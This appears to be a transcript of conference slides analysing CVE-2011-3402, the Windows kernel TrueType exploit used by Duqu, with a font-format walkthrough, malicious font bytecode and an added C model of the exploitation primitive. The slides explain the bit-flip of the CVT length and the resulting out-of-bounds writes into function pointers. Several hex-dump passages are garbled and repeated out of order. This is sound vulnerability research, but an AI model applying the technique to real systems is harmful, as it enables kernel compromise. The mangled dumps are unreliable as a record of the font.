Note: Because Type 1 font programs were originally produced and were carefully checked only within Adobe Systems, Type 1 BuildChar was designed with the expectation that only error-free Type 1 font programs would be presented to it. Consequently, Type 1 BuildChar does not protect itself against data inconsistencies and other problems.
- Adobe Systems Incorporated 1993, Adobe Type 1 Font Format, Third printing, Version 1.1, Addison-Wesley Publishing Company, Inc., Reading, Massachusetts, p. 8.

Friday, March 8, 2013

CVE-2011-3402 Windows Kernel TrueType Font Engine Vulnerability (MS11-087)
March 8, 2013, CanSecWest
Julia Wolf, FireEye, Inc.

Timeline
• May 2011: Earliest confirmed use of this exploit, as discovered by Kaspersky. (Unconfirmed possibilities of 2010 or 2005 for earliest use.)
• Aug-Oct 2011: CrySyS discovers “Duqu” and partners with Symantec. Kaspersky Labs publishes a ton of research too.
• Nov 2011: Microsoft names this “MS11-087”.
• Nov 2011: Details of exploit briefly appear on a Chinese web site.
• Dec 2011: Microsoft releases fix for vulnerability.
• Jun 2012: BlackHole developer begins to test this exploit. It didn’t work, so no one really noticed.
• Oct 2012: Cool Exploit Kit, and almost simultaneously BlackHole, begin using a fully working exploit.
• Currently: At least half a dozen exploit kits are using the exact same exploit code. (Only one has even changed the name.)

W32.Duqu: The precursor to the next Stuxnet
https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf

W32.Duqu, The precursor to the next Stuxnet, Version 1.3 (November 1, 2011)

Contents: Executive summary 1; Infection Statistics 3; Geographic distribution 3; File history 4; Technical Analysis 5; Installation 5; Installed component architecture 6; Load point (JMINET7.SYS) 7; Main DLL (NETP191.PNF) 8; Payload loader (Resource 302) 9; Payload (.zdata DLL) 12; Downloaded threats 15; Replication 17; Variants 18; CMI4432.SYS 18; CMI4432.PNF 18.

“Finally, the infostealer appears to have been first created along the same timeframe, in June 2011. The most recent variant was created on October 17, prior to the server being shutdown. Two of the additional DLLs pushed from the C&C were compiled hours before this sample. Note that the recovered Stuxnet files date between June 2009 and March 2010 and therefore date prior to the first development of these variants.”

Executive summary: “On October 14, 2011, we were alerted to a sample by the Laboratory of Cryptography and System Security (CrySyS) at Budapest University of Technology and Economics and appeared very similar to the Stuxnet worm of 2010. CrySyS named the threat Duqu [dyü-kyü] because it creates files with the file name prefix “~DQ”. The research lab provided their detailed initial report to us, which we have added as an appendix. The threat was recovered by CrySyS from an organization based in Europe and has since been found in numerous countries. We have confirmed W32.Duqu is a threat nearly identical to Stuxnet, but with a completely different purpose. Duqu is essentially the precursor to a future Stuxnet-like attack. The threat was written by the same authors, or those that have access to the Stuxnet source code, and the recovered samples have been created after the last-discovered version of Stuxnet. Duqu’s purpose is to gather intelligence data and assets from entities such as indus-”

Installation: “In one case, Duqu arrived at the target using a specially crafted Microsoft Word document. The Word document contained a currently undisclosed 0-day kernel exploit that allows the attackers to install Duqu onto the computer unbeknownst to the user. The full installation process for Duqu is quite involved and lengthy. To illustrate the installation process as simply as possible it can be divided into 2 parts: the exploit shellcode and the installer. The vulnerability details are currently undisclosed due to the current unavailability of a patch. Future versions of this paper will include the details related to the vulnerability.”

Exploit shellcode: “When the Word document is opened, the kernel mode exploit is triggered. The exploit contains shellcode, which will first check if the computer is already compromised by looking for the registry value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\“CFID”. If the computer has already been compromised, the shellcode gracefully exits.”

W32.Duqu
• Stuxnet’s cousin’s hairdresser’s former roommate... or something like that.
• For more information: http://www.google.com/search?q=duqu
• Initial vector was an Office Document emailed to victim(s), containing an embedded TTF, which exploited an 0-day in the Windows Kernel... because... because...

WIN32K.SYS
• Windows NT executes TrueType font programs...
• For rendering bitmaps...
• ... in Ring 0
• Yes, this is as insane as it sounds. But it gets even better...
http://technet.microsoft.com/en-us/library/cc750820.aspx

“This change as implemented in Windows NT 4.0 results in faster operation and reduced memory requirements, both visible benefits to the end user. And there is no loss of reliability, since (a) the kernel mode implementations of Win32 are fully protected from direct access by applications;”

“Security: Due to the modular design of Windows NT, moving Window Manager and GDI to kernel mode will make no difference to the security subsystem or to the overall security of the operating system; this will also have no effect on the C2 or E3 security certification evaluation, other than making it easier to document the internal architecture of Windows NT.”

“In the Windows NT Workstation 4.0 release, the Window Manager and GDI processes are still protected because applications cannot write to memory locations occupied by kernel mode code and data, as is shown above.”

“Consequently, there is no change in stability or reliability resulting from poorly behaved applications, because kernel-mode code and data is protected by the Windows NT architecture and the processor's memory protection system.”

“Note that in this respect of total isolation of critical operating system data from user-mode application code, Windows NT Workstation 4.0 remains unchanged in being architecturally more robust than other PC-based operating systems, such as Microsoft Windows 95, IBM OS/2 Warp, and Apple Macintosh operating systems.”

“All of those systems make a trade-off for greater performance and smaller memory footprint that involves [...] That tradeoff is entirely appropriate for today's low- and medium-range platforms, but not in a high-end platform such as Windows NT. With Windows NT 4.0, it remains true that if application code can crash the system, Windows NT has a bug, period.”

So, About Those Exploits...

Phylogenetic Tree
• The May 2011 Duqu Version
• The Aug 2011 MAPP Version
• The ??? 201? BHEK Version
• The Jun 2012 64bit Version
Renamed to “abcdef” Ver

Phylogenetic Tree
• Metadata is constant
• Font tables are constant
• Jokes are constant
• The (32bit) font program is constant. Except in the most recent exploit kit versions.
• (The first few bytes are NULLed out. It doesn’t affect execution, and may be an accident.)

Phylogenetic Tree
• The only major change has been the x86 shellcode. Completely different between versions.
• Oh, and there is that 64-bit version....
• I can’t find evidence of its existence prior to Jun 2012
• Appears to have been derived from the 32-bit version.
• Major changes: Offset to CVT overwrite, and the font program.

TrueType Font File Format

History
• The Earth Cools
• Bitmap Fonts
• PostScript Type 1, 2, 3, ..., 42 (cubic Bézier curves)
• TrueType (quadratic Bézier curves)
• OpenType... more of the same kind of thing

Cubic Bézier Curve

Rasterization Problems

SIGNAL PROCESSING: You’re doing it wrong.
Rasterization Solutions

Control Value Table

Just Go Read Apple’s Reference Manual...

Value / Description:
• capheight
• baseline
• height of serif
• width of serif
• uppercase stem width
• left side bearing
• uppercase stroke
• black body width of uppercase H

ALIGNRP[] Align point with rp point
The next instruction controls the length of the serifs on inside left stem. The same as in the previous instruction for the outer serif. This is accomplished w
PUSHB[] push two bytes onto the stack: point number, control value table location
MIRP[] Move point until its distance in the x direction from rp point is the value in control value table entry serif width. Set rp to rp. Do not change rp. Use the minimum distance. Round and use the cut in. This is a grey distance. Set rp to point.

Like This... Where the CVT “cuts in”

Things To Know...
• Glyphs are represented as outlines, which are then rasterized to the requested point size
• Outlines are drawn using a Turing-complete language to manipulate the graphics state
• Also there’s optional support in TTF for glyph bitmaps, in addition to these outlines

TrueType VM Environment
• A stack used by VM operators to POP arguments from, and PUSH results onto
• A “Storage Area” array of predefined size
• A “Control Value Table” of predefined size (Used implicitly by certain VM operators)
• Global Graphics State

On-Disk Format
• Based upon QuickDraw GX spline font “sfnt” format, which is sort of based upon the MacOS Resource Fork format, but zillions of other file formats basically do the same thing
• Offset-Length-Table
• Network (m68K) byte order

On-Disk Format
00000000  00 01 00 00 00 10 01 00 00 04 00 00 45 42 44 54  |............EBDT|
00000010  4b 90 43 d6 00 03 bd 54 00 00 00 28 45 42 4c 43  |K.C....T...(EBLC|
00000020  1f 4d 32 14 00 03 bd 7c 00 00 01 78 45 42 53 43  |.M2....|...xEBSC|
00000030  1e 20 05 0a 00 03 be f4 00 00 00 94 4f 53 2f 32  |. ..........OS/2|
00000040  03 bd 0e ca 00 03 ba 24 00 00 00 56 63 6d 61 70  |.......$...Vcmap|
00000050  00 61 00 57 00 03 ba 8c 00 00 00 34 63 76 74 20  |.a.W.......4cvt |
00000060  00 00 00 00 00 03 ba d0 00 00 00 02 66 70 67 6d  |............fpgm|
00000070  7f 06 e9 00 00 00 01 0c 00 03 b8 9b 67 6c 79 66  |............glyf|
00000080  18 d3 69 4b 00 03 ba e4 00 00 00 bc 68 65 61 64  |..iK........head|
00000090  db b2 28 94 00 03 ba a8 00 00 00 36 68 68 65 61  |..(........6hhea|
000000a0  00 16 00 be 00 03 b9 e0 00 00 00 24 68 6d 74 78  |...........$hmtx|
000000b0  00 82 00 1e 00 03 ba 7c 00 00 00 0e 6c 6f 63 61  |.......|....loca|
000000c0  00 5e 00 00 00 03 ba d4 00 00 00 0e 6d 61 78 70  |.^..........maxp|
000000d0  01 08 00 23 00 03 ba 04 00 00 00 20 6e 61 6d 65  |...#....... name|
000000e0  1c d0 3a db 00 03 bb a0 00 00 01 7c 70 6f 73 74  |..:........|post|
000000f0  9c 11 3e 69 00 03 bd 1c 00 00 00 35 70 72 65 70  |..>i.......5prep|
00000100  8b 9d ff 81 00 03 ba c0 00 00 00 0d b8 7f c0 b8  |................|
00000110  01 c0 63 b8 3a 40 60 b8 00 0c 60 1c 00 00 00 00  |..c.:@`...`.....|
00000120  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
etc...

The offset subtable (12 bytes)
00 01 00 00   Magic Number (Version). 0x00010000 is used for Windows TTF fonts, and in OTF is officially defined as “version 1.0”; “true” and “typ1” are also used for Mac fonts.
00 10         Number of Tables (16 in this case)
01 00         searchRange    (these three are for doing a log binary tree search)
00 04         entrySelector
00 00         rangeShift

16 table records follow the offset subtable.

A Table Record (16 bytes)
45 42 44 54   Tag (EBDT = “Embedded Bitmap DaTa”)
4b 90 43 d6   CheckSum (All bytes added together, mod 2^32)
00 03 bd 54   Offset (245076 bytes from beginning of file)
00 00 00 28   Length (Table is 40 bytes long)

Another Table Record (16 bytes)
45 42 4c 43   Tag (EBLC = “Embedded Bitmap Location”)
1f 4d 32 14   CheckSum (All bytes added together, mod 2^32)
00 03 bd 7c   Offset (245116 bytes from beginning of file)
00 00 01 78   Length (Table is 376 bytes long)
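The offset subtable and table-record layout walked through above, as an added example (not code from the talk or from any font engine): a Python parser that reads the 12-byte offset subtable and the 16-byte table records, recomputes the searchRange/entrySelector/rangeShift fields from numTables, implements the table checksum as the OpenType spec defines it (sum of big-endian 32-bit words, zero-padded to a multiple of four, mod 2^32), and bounds-checks every record against the file size, which is the check a loader has to make before trusting any offset. The sample bytes are the first 0x130 bytes of the directory reassembled from the hex dump on these slides; the rest of the font is not on the page, so the file size is passed in explicitly and the checksum routine is exercised on constructed data. The function names and the `file_size` parameter are my own.

```python
import struct

# Constructed sample: the first 0x130 bytes of the font's table directory, reassembled
# from the column-spilled hex dump on the slides. Nothing past offset 0x130 is on the page.
SAMPLE_HEADER = bytes.fromhex(
    "00010000 00100100 00040000 45424454"   # offset subtable (12 bytes) + tag 'EBDT'
    "4b9043d6 0003bd54 00000028 45424c43"   # EBDT checksum/offset/length, tag 'EBLC'
    "1f4d3214 0003bd7c 00000178 45425343"
    "1e20050a 0003bef4 00000094 4f532f32"
    "03bd0eca 0003ba24 00000056 636d6170"
    "00610057 0003ba8c 00000034 63767420"
    "00000000 0003bad0 00000002 6670676d"
    "7f06e900 0000010c 0003b89b 676c7966"
    "18d3694b 0003bae4 000000bc 68656164"
    "dbb22894 0003baa8 00000036 68686561"
    "001600be 0003b9e0 00000024 686d7478"
    "0082001e 0003ba7c 0000000e 6c6f6361"
    "005e0000 0003bad4 0000000e 6d617870"
    "01080023 0003ba04 00000020 6e616d65"
    "1cd03adb 0003bba0 0000017c 706f7374"
    "9c113e69 0003bd1c 00000035 70726570"
    "8b9dff81 0003bac0 0000000d b87fc0b8"   # 'prep' record, then the first fpgm bytes
    "01c063b8 3a4060b8 000c601c 00000000"
    "00000000 00000000 00000000 00000000"
)

OFFSET_SUBTABLE = struct.Struct(">IHHHH")  # sfntVersion, numTables, searchRange, entrySelector, rangeShift
TABLE_RECORD = struct.Struct(">4sIII")     # tag, checkSum, offset, length (all big-endian)


def parse_offset_subtable(data):
    version, num_tables, search_range, entry_selector, range_shift = OFFSET_SUBTABLE.unpack_from(data, 0)
    return {"version": version, "numTables": num_tables, "searchRange": search_range,
            "entrySelector": entry_selector, "rangeShift": range_shift}


def expected_search_fields(num_tables):
    """The three binary-search helper fields are a pure function of numTables."""
    entry_selector = num_tables.bit_length() - 1     # floor(log2(numTables))
    search_range = (1 << entry_selector) * 16        # largest power of two <= numTables, times 16
    return search_range, entry_selector, num_tables * 16 - search_range


def parse_table_records(data, num_tables):
    records = []
    for i in range(num_tables):
        tag, checksum, offset, length = TABLE_RECORD.unpack_from(
            data, OFFSET_SUBTABLE.size + i * TABLE_RECORD.size)
        records.append({"tag": tag.decode("latin-1"), "checksum": checksum,
                        "offset": offset, "length": length})
    return records


def table_checksum(table_bytes):
    """Sum of big-endian uint32 words, zero-padded to a multiple of 4, mod 2**32."""
    padded = table_bytes + b"\0" * (-len(table_bytes) % 4)
    total = 0
    for (word,) in struct.iter_unpack(">I", padded):
        total = (total + word) & 0xFFFFFFFF
    return total


def validate_directory(data, file_size=None):
    """Return a list of problems; an empty list means every record lies inside the file."""
    file_size = len(data) if file_size is None else file_size
    header = parse_offset_subtable(data)
    n = header["numTables"]
    if n == 0:
        return ["numTables is zero"]
    issues = []
    actual = (header["searchRange"], header["entrySelector"], header["rangeShift"])
    if actual != expected_search_fields(n):
        issues.append(f"search fields {actual} inconsistent with numTables={n}")
    directory_end = OFFSET_SUBTABLE.size + n * TABLE_RECORD.size
    if directory_end > min(len(data), file_size):
        issues.append(f"directory of {n} records runs past the available data")
        return issues
    for rec in parse_table_records(data, n):
        # Python ints do not wrap; a C loader must guard offset + length against 32-bit overflow.
        end = rec["offset"] + rec["length"]
        if rec["offset"] < directory_end or end > file_size:
            issues.append(f"table {rec['tag']!r} [{rec['offset']:#x}, {end:#x}) lies outside the file")
    return issues


if __name__ == "__main__":
    hdr = parse_offset_subtable(SAMPLE_HEADER)
    for rec in parse_table_records(SAMPLE_HEADER, hdr["numTables"]):
        print(f"{rec['tag']:4s} checksum={rec['checksum']:08x} offset={rec['offset']:6d} length={rec['length']}")
    print(validate_directory(SAMPLE_HEADER, file_size=245640))
```

Run against the slide's bytes, the parser reproduces the annotated values (EBDT at 245076, 40 bytes; EBLC at 245116, 376 bytes) and the computed search fields (256, 4, 0) match the header. A directory that passes this check still says nothing about the table contents; it only guarantees that every read the loader is about to do stays inside the file.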
Friday, March 8, 2013 00 4b 1f 1e 03 00 00 7f 18 db 00 00 00 01 1c 9c 8b 01 00 01 90 4d 20 bd 61 00 06 d3 b2 16 82 5e 08 d0 11 9d c0 00 00 43 32 05 0e 00 00 e9 69 28 00 00 00 00 3a 3e ff 63 00 00 d6 14 0a ca 57 00 00 4b 94 be 1e 00 23 db 69 81 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3a 00 10 03 03 03 03 03 03 00 03 03 03 03 03 03 03 03 03 40 00 01 bd bd be ba ba ba 01 ba b9 b9 ba ba ba bb bd ba 60 00 00 54 7c f4 24 8c d0 0c e4 a8 e0 7c d4 04 a0 1c c0 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 0c 00 00 00 01 00 00 00 00 b8 00 00 00 00 00 00 01 00 00 60 00 00 28 78 94 56 34 02 9b bc 36 24 0e 0e 20 7c 35 0d 1c 00 45 45 45 4f 63 63 66 67 68 68 68 6c 6d 6e 70 70 b8 00 00 Font Program Starts here 42 42 42 53 6d 76 70 6c 65 68 6d 6f 61 61 6f 72 7f 00 00 44 4c 53 2f 61 74 67 79 61 65 74 63 78 6d 73 65 c0 00 00 54 43 43 32 70 20 6d 66 64 61 78 61 70 65 74 70 b8 00 00 |............EBDT| |K.C....T...(EBLC| |.M2....|...xEBSC| |. ..........OS/2| |.......$...Vcmap| |.a.W.......4cvt | |............fpgm| |............glyf| |..iK........head| |..(........6hhea| |...........$hmtx| |.......|....loca| |.^..........maxp| |...#....... name| |..:........|post| |..>i.......5prep| |................| |..c.:@`...`.....| |................| b8__ = 7fc0 = b8__ = 00000000 00 01 = 00 01c0 00000010 4b 90 43 63__ 00000020 1f 4d = 32 00000030 1e 20 05 b8__ 00000040 03 bd = 0e 00000050 00 61 00 3a40 = 00000060 00 00 00 00000070 7f 06 = e9 60__ 00000080 18 d3 69 00000090 db b2 = 28 b8__ 000000a0 00 16 00 000c 000000b0 00 82 = 00 000000c0 00 5e 00 60__ 000000d0 01 08 = 00 000000e0 1c d0 3a 1c__ = 000000f0 9c 11 3e 00000100 00000110 00000120 etc... 
Font Program

b8 7f c0   PUSHW 32704
b8 01 c0   PUSHW 448
63         MUL
b8 3a 40   PUSHW 14912
60         ADD
b8 00 0c   PUSHW 12
60         ADD
1c         JMPR

MUL works on 26.6 fixed-point values, so it yields (32704 × 448) / 64 = 228928, and the two ADDs bring the total to 243852. JMPR pops that as a byte offset relative to the JMPR instruction itself (fpgm+15), so execution continues at fpgm+243867 (0x3B89B), which is exactly the length the table directory declares for fpgm: the jump lands at the declared end of the font program.
The name Table

• Kaspersky pointed this part out:

[Hex dump of the name table strings at 0x3bc00-0x3bd1f, stored as UTF-16BE. Decoded, they read:]

Copyright © 2003 Showtime Inc. All rights reserved.
DexterRegular
Dexter Regular
Version 1.00
Dexter is a registered trademark of Showtime Inc.

What? Why?

Copyright 2003 Showtime Inc. Dexter Regular

Except That...

I finally looked this up... The television show "Dexter" did not begin broadcasting until 2006!

Why Am I Telling You All This Stuff About Fonts?

Kernel Bug!

• This exploit works with all software which uses WIN32K.SYS for rendering fonts. (As it turns out, Chrome and Firefox use their own font engines, which are immune to this bug. This makes sense for portability reasons.)
• It also escapes from sandboxes, because it's not running in the sandbox: it's in kernel space!
• The shellcode will also have full system privileges to everything, automatically.

CVE-2011-3402

• The bug in WIN32K.SYS is a lack of a bounds check when merging two bitmaps together at some (X,Y) offset.

[Animated figure: the glyph bitmaps for "A" and "V" are merged into one bitmap at an X offset, giving "AV"; a second panel shows the same merging for vertically written text, 縦書き.]

• So, you control the bitmap data...
• And, you control the offset.
• The actual x86 instruction however is an OR operation, not a typical MOV.
• So you can only set one-bits, not zero-bits.

That Bug Allows This To Happen

953cdce5 8a03    mov al, byte ptr [ebx]     ; EBX comes from the TTF file: this is the bitmap data of your choice
953cdce7 0806    or  byte ptr [esi], al     ; ESI comes from the earlier offset calculation: and this is where you want to put it in memory!
The Important Bit

Exploiting This

• If you could only add numbers to arbitrary kernel memory locations, which values will lead to reliable shellcode execution?

Exploiting This

• Whoever created this exploit chose to use this static bitmap bug to add one, single bit to a well-chosen location.
• It was the length of the CVT array, stored within the TrueType VM's internal global state structure.
• As a consequence, the TrueType engine now believed that it held one hundred and twenty-nine elements, rather than the original length of one: the OR turned 0x01 into 0x81.

Exploiting This

• As luck would have it, the CVT just happens to live immediately below the global VM state structure in memory.

[Figure, "Before": CVT[0], followed directly by GlobalState.]
[Figure, "After": with the length now 129, the VM treats 129 entries starting at CVT[0] as CVT, so the "CVT" runs straight through the GlobalState structure above it.]

So, What Else Is In The VM State Structure?

• Function pointers, [explanation goes here]

NT Crash Dump
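An added model of the primitive the last slides describe, written for this page and not win32k code: the OR-merge with no bounds check, the single bit it sets in the CVT length, and what the oversized CVT then lets RCVT and WCVTP reach in the state structure above it. Everything is kept in one flat memory array so the model stays defined C; the layout (a 4×4 destination bitmap, the one-entry CVT right after it, then a length field and a pointer-sized field standing in for the global state), the offsets, and the function names are all this example's assumptions; the real structures are not on the page.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added model of the CVE-2011-3402 primitive, not win32k code. It keeps only
 * what the slides state: the bitmap merge ORs source bytes into the
 * destination at an attacker-chosen (x,y) with no bounds check, the CVT sits
 * immediately below the TrueType VM's global state, and one OR-ed bit turned
 * the stored CVT length from 1 into 129. Every offset and field below is an
 * assumption of this model. */

#define MEM_SIZE   320
#define DST_W      4                          /* destination bitmap: 4 bytes per row */
#define DST_H      4                          /* ... and 4 rows, so 16 bytes */
#define DST_OFF    0
#define CVT_OFF    (DST_OFF + DST_W * DST_H)  /* 16: the font's single CVT entry */
#define STATE_OFF  (CVT_OFF + 2)              /* 18: "global state" directly above the CVT */
#define CVTLEN_OFF (STATE_OFF + 0)            /* uint16 LE: CVT entries the VM believes it has */
#define FNPTR_OFF  (STATE_OFF + 2)            /* uint32 LE: stand-in for a function pointer */

static uint16_t rd16(const uint8_t *m, int off) { return (uint16_t)(m[off] | m[off + 1] << 8); }
static void wr16(uint8_t *m, int off, uint16_t v) { m[off] = (uint8_t)v; m[off + 1] = (uint8_t)(v >> 8); }
static uint32_t rd32(const uint8_t *m, int off) { return rd16(m, off) | (uint32_t)rd16(m, off + 2) << 16; }

/* Fresh VM: one CVT entry, length 1, and a recognisable pointer value. */
static void vm_reset(uint8_t *m)
{
    memset(m, 0, MEM_SIZE);
    wr16(m, CVT_OFF, 0x0010);
    wr16(m, CVTLEN_OFF, 1);
    wr16(m, FNPTR_OFF, 0xBEEF);
    wr16(m, FNPTR_OFF + 2, 0xDEAD);           /* reads back as 0xDEADBEEF */
}

/* The bug: dst[(y+r)*W + x + c] |= src[r*w + c], with nothing clipping (x,y)
 * to the destination. This is the "mov al,[ebx] / or [esi],al" loop: bits
 * can be set but never cleared. The one test below only keeps the *model*
 * inside its own array; it is not a bitmap bounds check. */
static int merge_or_unchecked(uint8_t *m, int x, int y, const uint8_t *src, int w, int h)
{
    int n = 0;
    for (int r = 0; r < h; r++)
        for (int c = 0; c < w; c++) {
            int off = DST_OFF + (y + r) * DST_W + (x + c);
            if (off < 0 || off >= MEM_SIZE) continue;
            m[off] |= src[r * w + c];
            n++;
        }
    return n;
}

/* The fix: every source pixel is clipped to the destination's own extent. */
static int merge_or_checked(uint8_t *m, int x, int y, const uint8_t *src, int w, int h)
{
    int n = 0;
    for (int r = 0; r < h; r++) {
        int dy = y + r;
        if (dy < 0 || dy >= DST_H) continue;
        for (int c = 0; c < w; c++) {
            int dx = x + c;
            if (dx < 0 || dx >= DST_W) continue;
            m[DST_OFF + dy * DST_W + dx] |= src[r * w + c];
            n++;
        }
    }
    return n;
}

/* RCVT / WCVTP as the VM does them: the index is checked against the *stored*
 * length only, so once that says 129 the "CVT" extends 256 bytes past its
 * real end, straight through the state structure above it. */
static int vm_rcvt(const uint8_t *m, unsigned idx, uint16_t *out)
{
    if (idx >= rd16(m, CVTLEN_OFF)) return -1;
    *out = rd16(m, CVT_OFF + 2 * (int)idx);
    return 0;
}
static int vm_wcvtp(uint8_t *m, unsigned idx, uint16_t v)
{
    if (idx >= rd16(m, CVTLEN_OFF)) return -1;
    wr16(m, CVT_OFF + 2 * (int)idx, v);
    return 0;
}

typedef int (*merge_fn)(uint8_t *, int, int, const uint8_t *, int, int);

/* The chain the slides describe: a 1x1 bitmap holding 0x80, placed at
 * (x=2, y=DST_H), lands one row below the destination, on the low byte of
 * cvt_len: 0x01 | 0x80 = 0x81 = 129. Two WCVTPs at indices 2 and 3 (rejected
 * while the length is 1) then overwrite the pointer field. Returns the length
 * the VM believes in; *fnptr receives the pointer field afterwards. */
static uint16_t run_chain(uint8_t *m, merge_fn merge, uint32_t *fnptr)
{
    static const uint8_t one_bit[1] = { 0x80 };
    vm_reset(m);
    merge(m, 2, DST_H, one_bit, 1, 1);
    vm_wcvtp(m, 2, 0x4141);
    vm_wcvtp(m, 3, 0x4141);
    *fnptr = rd32(m, FNPTR_OFF);
    return rd16(m, CVTLEN_OFF);
}

int main(void)
{
    uint8_t mem[MEM_SIZE];
    uint32_t p;
    uint16_t len = run_chain(mem, merge_or_unchecked, &p), v = 0;
    vm_rcvt(mem, 2, &v);
    printf("unchecked merge: cvt_len=%u fnptr=%08x rcvt(2)=%04x\n", len, (unsigned)p, v);
    len = run_chain(mem, merge_or_checked, &p);
    printf("checked merge:   cvt_len=%u fnptr=%08x\n", len, (unsigned)p);
    return 0;
}
```

The fix is the clipping in merge_or_checked, not anything in the VM: once the length field can be flipped, the VM's own index check is checking against attacker-controlled data, which is why a one-bit write into a length is worth as much as a full arbitrary write.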
But anyway...

GLYF Program

[Hex dump of two regions of the font. Rows 0x60-0x80 are the table-directory records for cvt, fpgm, glyf and head; decoded, cvt is at offset 0x3bad0 with length 2 (one entry), fpgm is at offset 0x10c with a declared length of 0x3b89b, and glyf (checksum 18 d3 69 4b) is at offset 0x3bae4 with length 0xbc. Rows 0x3bad0-0x3bbc0 hold the cvt and glyf data: the glyph's instructionLength field at 0x3baf0 reads 00 a9, and its instructions begin at 0x3baf2.]

This is what win32k!itrp_ExecuteGlyphPgm was executing: the glyph program, 169 bytes long. Its first instructions:

00000: PUSHB 0
00002: PUSHB 0
00004: WS
00005: FLIPOFF
00006: PUSHB 0
00008: RS
00009: RCVT
0000A: FLIPON
0000B: PUSHB 0
Friday, March 8, 2013 00 00 00 00 00 03 ba d0 7f 06 e9 00 00 00 01 0c 18 d3 69 4b 00 03 ba e4 00 00 00 02 66 70 67 6d 00 03 b8 9b 67 6c 79 66 00 00 00 bc 68 65 61 64 |............fpgm| |............glyf| |..iK........head| 00 00 00 45 42 b0 42 78 03 00 42 b5 44 00 00 00 00 00 b0 43 78 b0 43 b0 b0 31 03 45 03 00 00 00 |................| |.^..............| |......BN..CEM..C| |Ea..#x..C..` ..#| |B.Pa...#x.....C | |..a ..aE..#BE..#| |BE..#B..C..P\..#| |x..C..Ca..#x..C.| |.Ca\.+#x..C..` .| |.#B.Pa\.1#x....C| |B....CB....CEB..| |....C..`E.P`..C#| |D.....C..CD17...| |.....f.........f| |.............f..| |.........r......| 00 5e a9 61 b0 01 45 b0 43 23 b0 1c b0 00 00 01 00 00 b0 b0 50 61 b0 01 61 42 02 b0 01 00 00 04 00 00 00 17 61 20 03 43 5c b0 b0 00 1f 08 03 09 00 00 b0 23 b8 b0 23 b0 b0 50 03 43 b0 00 00 00 00 01 00 78 ff 01 42 02 2b 61 43 b0 00 66 01 02 00000: 00002: 00004: 00005: 00006: 00008: 00009: 0000A: 0000B: 00 00 42 b0 df 61 b0 43 23 5c 42 03 43 00 04 00 00 00 4e 00 23 45 01 61 78 b0 b0 60 b0 03 09 0e 00 00 00 b0 b0 01 b0 0d 00 23 b0 b0 43 01 01 72 PUSHB 0 PUSHB 0 WS FLIPOFF PUSHB 0 RS RCVT FLIPON PUSHB 0 00 00 43 01 80 23 00 23 43 78 00 50 44 04 00 00 00 01 45 60 1c 42 50 78 b0 b0 43 60 31 09 0c 03 00 00 4d 20 b0 45 5c b0 01 01 45 b0 37 00 00 00 00 01 b0 b0 00 b0 b0 01 60 b0 42 00 01 00 66 01 00 00 00 00 43 02 18 43 20 02 b8 43 01 00 00 04 00 01 43 23 20 23 23 b0 b0 43 ff 23 00 66 03 09 GLYF Program ... 00000060 00000070 00000080 ... 0003bad0 0003bae0 0003baf0 0003bb00 0003bb10 0003bb20 0003bb30 0003bb40 0003bb50 0003bb60 0003bb70 0003bb80 0003bb90 0003bba0 0003bbb0 0003bbc0 ... 
Friday, March 8, 2013 00 00 00 00 00 03 ba d0 7f 06 e9 00 00 00 01 0c 18 d3 69 4b 00 03 ba e4 00 00 00 02 66 70 67 6d 00 03 b8 9b 67 6c 79 66 00 00 00 bc 68 65 61 64 |............fpgm| |............glyf| |..iK........head| 00 00 00 45 42 b0 42 78 03 00 42 b5 44 00 00 00 00 00 b0 43 78 b0 43 b0 b0 31 03 45 03 00 00 00 |................| |.^..............| |......BN..CEM..C| |Ea..#x..C..` ..#| |B.Pa...#x.....C | |..a ..aE..#BE..#| |BE..#B..C..P\..#| |x..C..Ca..#x..C.| |.Ca\.+#x..C..` .| |.#B.Pa\.1#x....C| |B....CB....CEB..| |....C..`E.P`..C#| |D.....C..CD17...| |.....f.........f| |.............f..| |.........r......| 00 5e a9 61 b0 01 45 b0 43 23 b0 1c b0 00 00 01 00 00 b0 b0 50 61 b0 01 61 42 02 b0 01 00 00 04 00 00 00 17 61 20 03 43 5c b0 b0 00 1f 08 03 09 00 00 b0 23 b8 b0 23 b0 b0 50 03 43 b0 00 00 00 00 01 00 78 ff 01 42 02 2b 61 43 b0 00 66 01 02 00000: 00002: 00004: 00005: 00006: 00008: 00009: 0000A: 0000B: 00 00 42 b0 df 61 b0 43 23 5c 42 03 43 00 04 00 00 00 4e 00 23 45 01 61 78 b0 b0 60 b0 03 09 0e 00 00 00 b0 b0 01 b0 0d 00 23 b0 b0 43 01 01 72 PUSHB 0 PUSHB 0 WS FLIPOFF PUSHB 0 RS RCVT FLIPON PUSHB 0 00 00 43 01 80 23 00 23 43 78 00 50 44 04 00 00 00 01 45 60 1c 42 50 78 b0 b0 43 60 31 09 0c 03 00 00 4d 20 b0 45 5c b0 01 01 45 b0 37 00 00 00 00 01 b0 b0 00 b0 b0 01 60 b0 42 00 01 00 66 01 00 00 00 00 43 02 18 43 20 02 b8 43 01 00 00 04 00 01 43 23 20 23 23 b0 b0 43 ff 23 00 66 03 09 GLYF Program ... 00000060 00000070 00000080 ... 0003bad0 0003bae0 0003baf0 0003bb00 0003bb10 0003bb20 0003bb30 0003bb40 0003bb50 0003bb60 0003bb70 0003bb80 0003bb90 0003bba0 0003bbb0 0003bbc0 ... 
